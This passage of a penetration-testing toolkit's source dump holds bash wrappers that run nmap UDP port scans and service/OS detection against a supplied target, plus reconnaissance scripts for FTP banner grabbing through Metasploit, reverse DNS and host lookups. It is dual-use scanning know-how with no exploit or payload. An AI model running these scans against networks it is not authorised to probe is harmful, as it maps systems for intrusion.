12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
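# Full-range UDP port scan, skipping host discovery and DNS resolution,
# with nmap's default timing.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_full_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_full_${1//\//_}"

# -Pn makes nmap probe every address in the range, including ones that are
# down, so a large range takes correspondingly long.
nmap -sU -n -Pn -vv -p- --reason --open -oA "$out_base" "$1"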
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
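# Full-range UDP port scan that skips host discovery but still resolves
# names through DNS.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_full_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_full_${1//\//_}"

# Without -n nmap performs reverse-DNS lookups for the scanned addresses,
# which is visible to whoever operates the resolver.
nmap -sU -vv -p- -Pn --reason --open -oA "$out_base" "$1"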
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-super-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
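# Full-range UDP port scan tuned for speed: no host discovery, no DNS,
# aggressive timing and ICMP rate-limit handling disabled.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_full_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_full_${1//\//_}"

# --defeat-icmp-ratelimit trades accuracy for speed: ports that send nothing
# back are reported as closed|filtered instead of open|filtered, so only
# ports that answer over UDP show up as open. Treat the result as a first
# pass, not as a complete inventory.
nmap -sU -n -Pn -vv -p- --reason --open --defeat-icmp-ratelimit -T4 -oA "$out_base" "$1"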
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
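# Full-range UDP port scan with nmap defaults for host discovery, DNS and
# timing.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_full_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_full_${1//\//_}"

# -p- covers ports 1-65535; --reason records why each state was assigned.
nmap -sU -vv -p- --reason --open -oA "$out_base" "$1"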
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-fast-scan-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
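# UDP service/version and OS detection on a caller-supplied port list,
# skipping host discovery, with aggressive timing.
#
# Arguments:
#   $1  target IP address or IP range.
#   $2  the open UDP ports, separated by commas.
#
# Output: udp_services_<target>.{nmap,gnmap,xml} in the current directory.
# The name depends on the target only, so a second run against the same
# target with a different port list overwrites the first result.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 2 ]; then
    echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_services_${1//\//_}"

# -A adds OS detection, version detection, the default NSE scripts and
# traceroute. Both arguments are quoted so that stray whitespace in the port
# list cannot turn into additional nmap arguments.
nmap -sU -vv -A --osscan-guess --version-all -Pn "-p$2" -T4 -oA "$out_base" "$1"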
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-scan-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
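# UDP service/version and OS detection on a caller-supplied port list,
# skipping host discovery, with nmap's default timing.
#
# Arguments:
#   $1  target IP address or IP range.
#   $2  the open UDP ports, separated by commas.
#
# Output: udp_services_<target>.{nmap,gnmap,xml} in the current directory;
# the port list is not part of the name, so reruns overwrite earlier output.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 2 ]; then
    echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_services_${1//\//_}"

# --version-all tries every version probe; on UDP this is slow but thorough.
nmap -sU -vv -A --osscan-guess --version-all -Pn "-p$2" -oA "$out_base" "$1"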
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
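# UDP service/version and OS detection on nmap's 1000 most common UDP
# ports, skipping host discovery.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_services_1000_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_services_1000_${1//\//_}"

# -A adds OS detection, version detection, the default NSE scripts and
# traceroute; --open keeps closed ports out of the report.
nmap -sU -vv -A --osscan-guess --version-all -Pn --top-ports 1000 --open -oA "$out_base" "$1"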
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-scan-top400-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
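# UDP service/version and OS detection on nmap's 400 most common UDP ports,
# skipping host discovery.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_services_400_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_services_400_${1//\//_}"

# Quoting the target keeps the shell from splitting or glob-expanding it.
nmap -sU -vv -A --osscan-guess --version-all -Pn --top-ports 400 --open -oA "$out_base" "$1"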
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-super-fast-scan-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
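# UDP service/version and OS detection on a caller-supplied port list,
# tuned for speed: no host discovery, aggressive timing, ICMP rate-limit
# handling disabled.
#
# Arguments:
#   $1  target IP address or IP range.
#   $2  the open UDP ports, separated by commas.
#
# Output: udp_services_<target>.{nmap,gnmap,xml} in the current directory;
# the port list is not part of the name, so reruns overwrite earlier output.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 2 ]; then
    echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_services_${1//\//_}"

# --defeat-icmp-ratelimit makes silent ports show as closed|filtered rather
# than open|filtered, so a port missing from this report is not proof that
# nothing listens there.
nmap -sU -vv -A --osscan-guess --version-all -Pn "-p$2" -T4 --defeat-icmp-ratelimit -oA "$out_base" "$1"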
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
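# Scan nmap's 1000 most common UDP ports with no host discovery, no DNS and
# aggressive timing.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_top1000_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_top1000_${1//\//_}"

# -n: no DNS resolution, -Pn: treat every host as up, -T4: aggressive timing.
nmap -sU -n -Pn -vv --top-ports 1000 --reason --open -T4 -oA "$out_base" "$1"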
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
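# Scan nmap's 1000 most common UDP ports with normal host discovery and
# without DNS resolution.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_top1000_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_top1000_${1//\//_}"

# No -Pn here: hosts that fail discovery are skipped rather than scanned.
nmap -sU -n -vv --top-ports 1000 --reason --open -oA "$out_base" "$1"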
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
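# Scan nmap's 1000 most common UDP ports, skipping host discovery and DNS
# resolution, with default timing.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_top1000_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_top1000_${1//\//_}"

# --reason records why nmap assigned each port state, which helps when
# telling a real answer from a timeout in the UDP results.
nmap -sU -n -Pn -vv --top-ports 1000 --reason --open -oA "$out_base" "$1"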
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
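# Scan nmap's 1000 most common UDP ports, skipping host discovery but still
# resolving names through DNS.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_top1000_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_top1000_${1//\//_}"

# Without -n nmap performs reverse-DNS lookups for the scanned addresses.
nmap -sU -vv --top-ports 1000 -Pn --reason --open -oA "$out_base" "$1"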
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-super-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
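# Scan nmap's 1000 most common UDP ports tuned for speed: no host
# discovery, no DNS, aggressive timing, ICMP rate-limit handling disabled.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_top1000_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_top1000_${1//\//_}"

# --defeat-icmp-ratelimit trades accuracy for speed: silent ports are
# reported as closed|filtered instead of open|filtered, so only ports that
# answer over UDP are listed as open.
nmap -sU -n -Pn -vv --top-ports 1000 --reason --open --defeat-icmp-ratelimit -T4 -oA "$out_base" "$1"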
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
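# Scan nmap's 1000 most common UDP ports with nmap defaults for host
# discovery, DNS and timing.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_top1000_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# The base name used to be udp_ports_full_<target>, the name the full-range
# scripts write to, so a top-1000 run overwrote the results of a full scan
# of the same target. Use the top1000 prefix like the other top-1000
# scripts, and keep "/" from a CIDR range out of the file name.
out_base="udp_ports_top1000_${1//\//_}"

nmap -sU -vv --top-ports 1000 --reason --open -oA "$out_base" "$1"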
35 |
--------------------------------------------------------------------------------
/reconnaissance/ftp-banner.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
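# Collect the FTP banner/version of a server by driving Metasploit's
# auxiliary/scanner/ftp/ftp_version module from a here-document.
#
# Arguments:
#   $1  the target ftp server (becomes the module's RHOSTS value).

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target ftp server." 1>&2
    exit 1
fi

# The target is pasted into the resource script below, where every line is
# a console command; a line break inside the argument would therefore be
# executed as an additional command. Refuse such input.
if [[ $1 == *$'\n'* || $1 == *$'\r'* ]]; then
    echo "The target must not contain line breaks." 1>&2
    exit 1
fi

# -q suppresses the banner and "-r -" reads the resource script from
# standard input, i.e. from the here-document.
msfconsole -n -q -r - << EOF
use auxiliary/scanner/ftp/ftp_version
set RHOSTS $1
run
exit
EOF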
35 |
--------------------------------------------------------------------------------
/reconnaissance/hostname.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
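# Reverse-resolve one IP address with nslookup, print "<ip> <names>" and
# append the names to ip_hostname_<ip>.txt in the current directory.
#
# Arguments:
#   $1  the target IP address.

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address." 1>&2
    exit 1
fi

# Build the log file name from the target, turning runs of "/" and "." into
# a single "_". A private variable is used instead of LOGNAME: that name is
# the standard login-name environment variable, and when it is exported (as
# it normally is) reassigning it changes what child processes see.
log_file="ip_hostname_$1"
log_file=$(echo "$log_file" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g')
log_file="$log_file.txt"

# printf instead of "echo -n" so an argument that looks like an echo option
# is still printed literally.
printf '%s ' "$1"

# Keep the lines that carry "name", strip the "name = " label and join
# multiple PTR answers onto one space-separated line.
nslookup "$1" | grep 'name' | cut -f2 | sed 's/name = //' | sed ':a;N;$!ba;s/\n/ /g' | tee -a "$log_file"
echo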
35 |
--------------------------------------------------------------------------------
/reconnaissance/ip.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
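# Print the IPv4 address(es) that `host` reports for one name.
#
# Arguments:
#   $1  the target host.

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target host." 1>&2
    exit 1
fi

# Only "has address" lines are kept (these are the A records in host's
# output); field 4 of such a line is the address itself. The argument is
# quoted so the shell passes it to host as a single word.
host "$1" | grep "has address" | cut -d" " -f4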
30 |
--------------------------------------------------------------------------------
/reconnaissance/ips.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
